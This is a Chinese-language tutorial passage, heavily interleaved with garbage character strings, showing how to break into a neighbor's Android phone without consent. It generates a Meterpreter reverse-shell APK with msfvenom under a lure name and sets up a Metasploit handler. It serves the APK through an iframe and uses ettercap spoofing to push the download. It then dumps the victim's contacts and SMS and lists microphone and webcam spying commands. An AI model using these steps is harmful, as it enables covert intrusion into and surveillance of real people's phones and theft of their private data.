4 \% Z( g. b3 R1 \ Q1 I" \7 x
五、msf+ettercap入侵邻居安卓手机 " b7 L, S' o A. i* I
5 w# c. j K0 x0 p$ d3 q' {; P: {# k2 o, N- E
首先启动msf 9 J$ |5 A+ W* ^7 D: j3 A- `7 G
' G k8 E; {0 ~# M9 h' [
b' @- O g( z1 r# _
先用kali生成一个安卓木马,如下命令:
7 c+ k6 _5 r. [' [ / g2 A, O! s4 U. q7 V
; ?' Z% l% @3 i: B: P- c
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
9 I3 q4 G! G( G) z ; ?7 R8 s2 E9 ~9 p$ {0 g
3 s }' b( h5 t0 ^
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
. Z; \2 ?1 j5 V$ T7 V% n; {' }+ N $ U/ K( F: S( o1 U' t8 k3 `
, o& t( U+ O% @& p3 }' z
然后进入msf
+ n, w! C+ X8 G/ g3 a ' G! g) p' k; O) w$ \
. a7 I' Z: k/ d% q0 _* V4 W
use exploit/multi/handler ' W& v. D; r2 Y
& @5 _& ]5 {# K* i# Z m5 @. G& N* t
0 n* o' w$ [: x( f# X# W7 d' @ set payload android/meterpreter/reverse_tcp # }- z# ~, o8 `8 ^1 E3 A
7 t) t' m/ c! i$ J4 P% w
" b3 ~* D( E8 q7 Z set LHOST 192.168.0.109 //ip为kaili的ip
0 |5 l0 G8 y7 N' s1 d2 F / {8 v( }, |1 f; m
* i' O+ ^) A, ~ set LPORT 44444 //端口一定要与前面生成的木马的端口一致 # o0 p2 \ s3 \4 n4 s
b- O/ J, C4 j0 N# D' l1 c. U
; {9 {: T& p$ X, J$ n
Exploit + I! U5 O0 [, s. J5 W
9 {% I" r. A+ `5 l* O0 G# m! P; v+ j7 g" w% j
- A$ I- C' c5 ^. b( v9 B! n
4 o0 r7 E- I" ?
# e$ y6 e9 G/ y9 m# f$ l
下面我们开启ettercap -G + x% \4 c# g+ R _
' N3 ^: s; d1 s, J0 j0 f$ k) @
( |- s5 V6 w3 \' a2 a 我物理IP为 , f0 o: {* L' i' g
$ t7 b; t6 P1 _7 J, x& d/ h9 M
8 N( X( o+ h$ e7 Q+ b" R3 F- n
4 h6 o2 y& o8 k6 m
1 l1 Q: ^0 ~ r
9 ~7 I, X7 f) x6 g( Q$ p, g 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, ! \% y7 h; w6 l/ e1 Z$ y" p
+ l! [6 w; W# Y9 C
2 O! E, a" i6 ~( F" S* s 下面我们来设置一下
2 R' L7 j3 F9 R & ^$ _ c2 j8 u- r
% X b& ^, B/ F+ a M" V ! P6 X i2 _7 _2 Q6 H. B2 z
) W) _, D9 G* A+ w) @6 u. c9 l3 H& H, t" v
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
; T# t" d1 {# C: q; C 9 _7 \8 B0 d$ `3 q% j% i
! {, P7 a5 V+ p" _
- A* {/ B* e7 d6 b+ z, a% |! N; ^
4 `: F. r8 i. `3 \
) A$ W/ J' i% G
' _% P8 W4 I& t6 {4 i
: u' s( ~% ^! ]1 _* c
* b, h8 V# I& I$ m$ Q+ e
# A' e( w7 ^3 r5 A% L
0 s# U5 D0 l9 ~' s b9 F0 F4 W' X r$ d* {, B7 E& v' W. H
; u3 f+ ?6 V) e2 d9 |" G+ Z
6 O# d9 ?* s) r6 X" f) K: V) L7 ?0 i( T/ v
# x6 D/ ]; F/ Y* @5 J6 J
4 G9 v& @- `5 p. Q
: Q& \( L* q7 ^ N! r9 [- Q
3 i# B/ T) b' Q2 G6 E9 }
! p# n" p7 y& d2 @5 U9 H* P+ z. z0 X N: D7 I
1 U$ Z* Z* C, t8 [% b L
8 T' Y8 g3 m2 L/ P) W- G& Z! m8 E
0 ~2 s" S* K1 e4 K* T' E * }( E0 Q) r8 O, R. v
' e5 r2 s: G8 l/ L, `1 [
% T3 L& j( [7 l6 L/ R8 N % z% }9 u4 {# i& b' Z$ S' I
3 {$ z7 f) l5 }1 A6 U" e2 p- Y. _3 L4 a( N
2 @5 V5 T9 L* V# j2 d- F
7 ` h. K% W. q& _( a$ s/ U/ {, L: {) c" W3 p% E6 ]7 k
/ e5 i5 R9 E/ ]
. h: |4 e# D( Y0 A4 q" \" O, b' D
2 O$ h5 h; P4 E1 `7 A
- m! S F) I. ?& d$ R7 u
4 s: Z w1 i( I! S* c
1 j$ V7 s, I! m5 ~. r! v* m
, d# h. r. u) S4 T
6 f0 J6 p$ ^: L9 j! x7 u
# z6 `7 e9 t, n+ t5 ]( B5 ] 下面我们开始攻击
" \; ^$ @* b/ X* T: n' u % |; e( W1 I: U2 q
* N1 _( |6 O! R ?% E9 B& J6 [ " b: l4 h. x6 s9 N! F7 S9 V% e
- X( D, {' y2 ~3 G# A, `3 t1 z# m. L$ ?+ z, { @9 \
- i8 l% A( I7 i. s/ b7 c1 ^ % z& k4 G1 E3 Y6 c# Y3 R* h
9 o7 |+ }% j! r3 t, [ : O1 I2 M7 C/ \
8 b6 H1 ?. k K% h' W' k5 t( e1 l
) ]/ ]* l1 s' b" R
6 ~% [) K. ^6 a$ x; `, {. a5 [- r8 u
3 z, E8 M8 V3 U/ N2 a
& P7 ^ d* ]2 d$ D7 ~ 6 N% Y6 g. V3 L5 P6 u
* U1 X3 S6 l# M
, X8 a6 i- m( D) w; Q! R) `. P, r) u" ^
大概过了5分钟多,发现反弹成功了 / c- ^- {: q, j6 i, H! [7 g; j
4 a2 @2 @/ ^" a) m5 O! E
! P0 N( ^- t# r2 Y; r
6 \; [2 x& W. p; w$ z 8 [5 p5 g7 k# m+ `% g* N! \
+ q5 Q. E5 {7 t1 p6 X / g2 P2 l2 g7 |. i/ U
/ E/ U, x2 P4 i
- S* I- S8 F; Z7 G1 ^' \
# y8 K1 T) l) u% ~3 J; F" s G
0 j, d7 G. L. y- u6 H7 k3 d2 a
! ^' e& `- m3 { ~ L- e
# N2 ]5 B. ~1 P; @+ C8 B 7 e8 ~! S; s1 }: D" g
, t1 C1 I% x7 |* X! [
* n8 D* S, O$ i# X$ `# ?* }
& T; U3 N1 R) v! b. E1 n
- ` t# v/ T( R, D( N6 y * m) s' r/ g. W( l n6 ^0 S
! {) \! B x+ Z7 r4 n8 p# E
$ n% C) l% b! e3 Q5 i4 e6 I
9 X6 d1 E j( O8 @% t
% W& f$ ~7 z7 x: @: i# u' ~# b& Z
% J: t) s% Z0 g5 s1 T6 V
执行命令 1 H( X' b# L0 e) ]1 H% K6 j& y1 [
% w. [9 h: j( S; W0 C w; n
$ {# N7 k$ F0 n0 ^5 C $ @' z+ Q( D a
' \& u. K |$ |5 X t- W8 F: T
# Z, Y3 Y0 q( ~, ]. a( Z
dump_contacts --》这个是导出电话 2 b9 M7 _- j0 x. k+ }; ?
b. q; Y: g. F, `: A0 q
" J- I- z$ }* \+ u" V dump_sms --》这个是导出信息
" ]3 f# T) r( d- ]# `
/ j$ T2 X# f+ ~0 P" [3 a
; W, d& K4 T8 k9 X2 `! \7 Q3 K5 v record_mic Record audio from the default microphone for X seconds 5 v6 P6 A8 d# P/ x# d, Q6 @
0 B0 v! w$ V( r% p1 P% u
* I% H1 A4 ~" y9 u webcam_chat Start a video chat
, W0 o& |# N9 s, L
* H6 I7 k. \ R6 C0 b
3 R5 ?7 G; V5 E" r8 _& b9 y, o webcam_list List webcams
6 e7 c F; ^- y% b( M2 y) f
2 i N; b9 e1 u1 n7 L4 W' p k
; |6 Y/ @, T+ E6 E$ F webcam_snap Take a snapshot from the specified webcam
) _# H# z$ J" [4 n U: |! \* s * R0 v. @) h' J. }
( I, L8 f1 l/ A7 a webcam_stream  lay a video stream from the specified webcam / F9 M, v" r" L8 h C3 x9 E! C' b
. H2 }. ~2 @* t5 D; D: H* P: K. K
+ n3 ^3 n# K( |( U# M $ {- Y/ B& [$ |* E: t( T2 s5 n
! @" I& a1 I7 O$ K; b
% N% z" |( W- ?0 w# O ) ^: O9 g: F3 x8 f
0 y9 N5 }% N t/ K' H4 K! k$ f0 n' \ j1 a) T
# ^0 w q: C7 }' v8 b
我们打开看一下电话薄,
5 }9 }+ u6 ^: ~# c1 k
3 h S( j; I1 [$ H9 ~& x9 X. ]# ~2 @' x2 a1 ^* J% V
1 a, a$ v0 M0 m" u* H
! e1 W, |1 o* a$ q. q% x2 B
$ V1 I0 T6 \+ P& Y1 Q$ g# G- c
0 T! l0 `* O9 Y
( z, {5 m2 |7 s5 E+ ^ }/ H8 p0 e, w" F* w
/ m, F3 [, N8 b% w# w) Q" [
& O: v |& _8 n( ]% y' U7 Z
' r7 O( C0 B/ K5 b4 t4 }- [
( [) X9 b5 `' B$ B) n4 S. P! I * p7 D- S$ T1 R6 S, A% V
5 C6 ]. G4 l2 [& V2 m" q2 Z0 I / H+ ?, a) B x& x$ N* D
; @% R- p7 I) J% Z& I
+ A$ i( J. D; m # o8 ~8 s+ }. [& X6 ]& v; T: h
, n+ `" B! c* ]+ y) a; z3 c3 U! C& z9 i; I2 Y
我们同时欺骗成DroidJack木马,使用方法如图:
+ E9 B x& O( B' p& M9 h 0 G- o6 L6 g- U x& C1 r0 \ }
6 y& B3 a( o W6 b: f/ m0 M* U
2 U0 x1 G# B- i+ B/ H
" Y* M1 S' G+ B; c0 S: U
2 ~4 o9 F' Z' c( Q$ R+ k
- i& U% g+ _) \8 B4 @) }
s* Z, \+ }7 J6 `# N) X5 w
7 v7 z. {& y8 N, d
, j) |: @( _2 h% P ' x4 ^2 a" T4 Z+ C1 M
9 z2 o/ T* i6 i8 y: g/ f 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
7 S3 c( M' v4 T5 Y0 O& p$ D, p5 s , l8 K) N) H, i; W# V1 S
2 h- l' @/ j- s8 d' j! W3 ^ - G% u) U- V) q5 K" N: R
2 c+ E! @* g) }# E. ]' _
g- M }( E6 v4 N, v7 z- ~" F
& I8 [, V3 ]6 C
7 [6 i7 C. U1 M6 u0 u% D$ w7 D- j$ y1 M! y+ V
3 T0 f, e: c* c7 ?
2 ?. F) Q6 ~. |( t
" \6 Z% H% i$ ~
: y; `( P8 Z" G* I9 K# p- k " E) h2 C! A9 R& B
: a! ?2 Y. V7 }% X1 d
8 p5 _, |8 Q' Z; a |